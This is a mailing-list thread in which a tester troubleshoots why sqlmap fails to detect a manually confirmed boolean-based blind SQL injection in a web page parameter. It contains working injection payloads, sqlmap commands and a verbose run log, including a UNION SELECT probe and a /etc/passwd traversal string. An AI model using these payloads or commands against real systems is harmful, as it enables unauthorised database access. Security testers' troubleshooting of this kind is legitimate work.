Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQ
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi
|
From: Johnathon D. <hoo...@gm...> - 2015-04-29 14:13:29
|
Curious, have you tried using the --prefix and --suffix options to frame your injection to see if that helps? On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amc...@gm...> wrote: > OK. You're right in that the following lines in your dummy output > should produce discernable responses when tested against the > application: > PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ > PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd > > I've verified this manually. Thanks and I'll send you the traffic output > file. > > Cheers, > > Alistair. > > On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar > <mir...@gm...> wrote: > > I would say that you screwed something up. Can you please send that > traffic > > file I requested. > > > > Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection' > > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are > > invalid. > > > > $ python sqlmap.py -u > www.site.com/help/UserGuide.aspx?Sec=PackageSelection > > --dummy -v 3 > > _ > > ___ ___| |_____ ___ ___ {1.0-dev-03f32ae} > > |_ -| . | | | .'| . | > > |___|_ |_|_|_|_|__,| _| > > |_| |_| http://sqlmap.org > > > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > > mutual consent is illegal. It is the end user's responsibility to obey > all > > applicable local, state and federal laws. Developers assume no liability > and > > are not responsible for any misuse or damage caused by this program > > > > [*] starting at 08:55:05 > > > > [08:55:05] [DEBUG] cleaning up configuration parameters > > [08:55:05] [DEBUG] setting the HTTP timeout > > [08:55:05] [DEBUG] creating HTTP requests opener object > > [08:55:05] [DEBUG] heuristically checking if the target is protected by > some > > kind of WAF/IPS/IDS > > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name > > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd > > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743 > > [08:55:05] [INFO] testing if the target URL is stable. This can take a > > couple of seconds > > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page > > comparison on a sequence matcher. If no dynamic nor injectable parameters > > are detected, or in case of junk results, refer to user's manual > paragraph > > 'Page comparison' and provide a string or regular expression to match on > > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] > > [08:55:08] [INFO] searching for dynamic content > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446 > > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to > > retry the request > > [08:55:08] [INFO] searching for dynamic content > > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic > > [08:55:08] [PAYLOAD] 2485 > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867 > > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic > > [08:55:08] [PAYLOAD] 8682 > > [08:55:08] [INFO] GET parameter 'Sec' is dynamic > > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").' > > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter > 'Sec' > > might not be injectable > > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs > > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec' > > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643 > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833 > > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186 > > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897 > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851 > > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559 > > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554 > > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ > > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN > > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745 > > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd > > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE > > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'=' > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495 > > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'=' > > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'=' > > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt > > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685 > > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy > > ... > > > > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm... > > > > wrote: > >> > >> Hi Brandon, > >> > >> Thanks for your comment. Confirming that i've tried risk=3 with > >> level=5 with the same results. I've looked more closely at the > >> requests that sqlmap is sending to check if the parameter is > >> injectable. It is testing the Sec paramater with values such as: > >> > >> PackageSelection) AND 1477=7114 > >> PackageSelection) AND 1631=1631 > >> PackageSelection') AND 5603=7729 > >> PackageSelection') AND 1631=1631 > >> PackageSelection' AND 3943=9381 > >> PackageSelection' AND 1631=1631 > >> PackageSelection" AND 3324=4690 > >> PackageSelection" AND 1631=1631 > >> PackageSelection) AND 4734=6616 AND (6346=6346 > >> PackageSelection)) AND 7350=9272 AND (8861=8861 > >> > >> When in fact, i assume it would need to use logic like I used to get > >> distinguishable responses: > >> > >> PackageSelection (returns response A) > >> PackageSelection' AND '1'='1 (returns response A) > >> PackageSelection' AND '1'='2 (returns response B) > >> > >> In a nutshell, it doesn't appear to be trying single quotes and values > >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty > >> typical format for checking boolean-based blind SQLi. > >> > >> Cheers, > >> > >> Alistair. > >> > >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry > >> <bpe...@gm...> wrote: > >> > It's a GET, so there wouldn't be a content type, unless I am mistaken. > >> > > >> > Alistair, have you tried --risk=3 with --level=5 yet? > >> > > >> > Sent from a phone > >> > > >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar > >> > <mir...@gm...> > >> > wrote: > >> > > >> > Can you please send the unredacted content of request.txt to my > address? > >> > > >> > If not, then please at least send me the content of traffic file which > >> > you > >> > can obtain by just appending the "-t traffic.txt" to the regular > >> > sqlmap's > >> > run. > >> > > >> > Bye > >> > > >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson > >> > <amc...@gm...> > >> > wrote: > >> >> > >> >> Thanks for the quick reply. > >> >> > >> >> The contents of the request file are as follows: > >> >> > >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1 > >> >> Host: <redacted> > >> >> Accept: */* > >> >> Accept-Language: en > >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; > >> >> x64; Trident/5.0) > >> >> Connection: close > >> >> Referer: <redacted> > >> >> Cookie: <redacted> > >> >> > >> >> I've redacted some of the details as it's not appropriate to draw > >> >> attention to an internet facing application's SQLi vulnerability. > >> >> > >> >> When providing the request file as part of the following command: > >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' > >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string > >> >> 'industries' -v 1 > >> >> > >> >> sqlmap executes as normal but cannot identify (and therefore cannot > >> >> exploit) the boolean-based blind vulnerability which I've verified > >> >> manually. > >> >> > >> >> Thanks again, > >> >> > >> >> Al. > >> >> > >> >> > >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar > >> >> <mir...@gm...> wrote: > >> >> > And what is the content of request file? > >> >> > > >> >> > Bye > >> >> > > >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson > >> >> > <amc...@gm...> > >> >> > wrote: > >> >> >> > >> >> >> Hi sqlmappers, > >> >> >> > >> >> >> I'm a fairly experienced user of sqlmap having used it extensively > >> >> >> in > >> >> >> the past. I came across what appeared to pretty typical > >> >> >> boolean-based > >> >> >> blind SQLi in an application I'm (legally) testing. However, for > the > >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as > >> >> >> vulnerable to exploit it further. And as we know, manually > >> >> >> exploiting > >> >> >> blind SQLi is cumbersome to say the least. > >> >> >> > >> >> >> Here is a summary of the requests i've made to manually confirm > the > >> >> >> vulnerability. > >> >> >> > >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A) > >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns > >> >> >> response > >> >> >> A) > >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns > >> >> >> response > >> >> >> B) > >> >> >> > >> >> >> I've tried various sqlmap flags and thought the following command > >> >> >> would give me the best chance of success: > >> >> >> > >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' > >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string > >> >> >> 'industries' -v 1 > >> >> >> > >> >> >> Note: the string 'industries' is text that appears in response A > but > >> >> >> not response B. > >> >> >> > >> >> >> I've looked at the requests that sqlmap is sending in the > background > >> >> >> (proxied through burp). It appears that it's attempting to exploit > >> >> >> this with the AND statement as it should but is not using single > >> >> >> quotes as per my example above. > >> >> >> > >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, > i'd > >> >> >> be > >> >> >> more than happy to contribute some time to improve it so it can > >> >> >> identify injectable parameters such as these in the future. > >> >> >> > >> >> >> Thanks, > >> >> >> > >> >> >> Al. > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > ------------------------------------------------------------------------------ > >> >> >> One dashboard for servers and applications across > >> >> >> Physical-Virtual-Cloud > >> >> >> Widest out-of-the-box monitoring support with 50+ applications > >> >> >> Performance metrics, stats and reports that give you Actionable > >> >> >> Insights > >> >> >> Deep dive visibility with transaction tracing using APM Insight. > >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > >> >> >> _______________________________________________ > >> >> >> sqlmap-users mailing list > >> >> >> sql...@li... > >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > > >> >> > > >> >> > > >> >> > > >> >> > -- > >> >> > Miroslav Stampar > >> >> > http://about.me/stamparm > >> > > >> > > >> > > >> > > >> > -- > >> > Miroslav Stampar > >> > http://about.me/stamparm > >> > > >> > > >> > > ------------------------------------------------------------------------------ > >> > One dashboard for servers and applications across > Physical-Virtual-Cloud > >> > Widest out-of-the-box monitoring support with 50+ applications > >> > Performance metrics, stats and reports that give you Actionable > Insights > >> > Deep dive visibility with transaction tracing using APM Insight. > >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > >> > > >> > _______________________________________________ > >> > sqlmap-users mailing list > >> > sql...@li... > >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > One dashboard for servers and applications across Physical-Virtual-Cloud > Widest out-of-the-box monitoring support with 50+ applications > Performance metrics, stats and reports that give you Actionable Insights > Deep dive visibility with transaction tracing using APM Insight. > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
